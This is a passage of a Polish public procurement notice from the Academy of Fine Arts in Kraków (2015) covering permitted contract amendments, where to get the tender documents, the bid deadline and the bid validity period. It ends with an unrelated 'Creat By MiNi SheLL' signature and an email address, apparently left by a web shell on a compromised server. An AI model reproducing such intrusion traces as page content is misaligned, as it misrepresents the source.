<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Wszelkie zmiany umowy wymagają dla swej ważności formy pisemnej pod rygorem nieważności  i będą dopuszczalne w granicach unormowania artykułu 144 ustawy Prawo zamówień publicznych. 
4. Zmiana umowy może nastąpić  w następujących przypadkach i zakresie:
1)	z przyczyn leżących po stronie Zamawiającego lub przeszkodami dającymi się przypisać Zamawiającemu, 
2)	numeru katalogowego produktu,  nazwy produktu przy zachowaniu jego parametrów,              z przyczyn niezależnych od Wykonawcy (np. przy zmianie dokonanej przez producenta)
3)	w razie wystąpienia przejściowego braku produktu z przyczyn leżących po stronie producenta przy jednoczesnym dostarczeniu produktu zamiennego o parametrach nie gorszych od produktu objętego umową,
4)	w razie niedostępności na rynku produktów wskazanych w ofercie, wynikającej                        z zaprzestania produkcji, wycofaniem z rynku lub z innych przyczyn niezależnych od obu Stron umowy,
5)	zmiany przepisów prawnych istotnych dla realizacji przedmiotu umowy.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.asp.krakow.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Akademia Sztuk Pięknych im. Jana Matejki w Krakowie, 31-157 Kraków, Plac Jana Matejki 13 - pokój nr 115.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 10.09.2015 godzina 10:30, miejsce: Biuro Rektora ASP im. Jana Matejki  w Krakowie, 31-157 Kraków, Plac Jana Matejki 13, pokój nr 104 (I piętro).</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com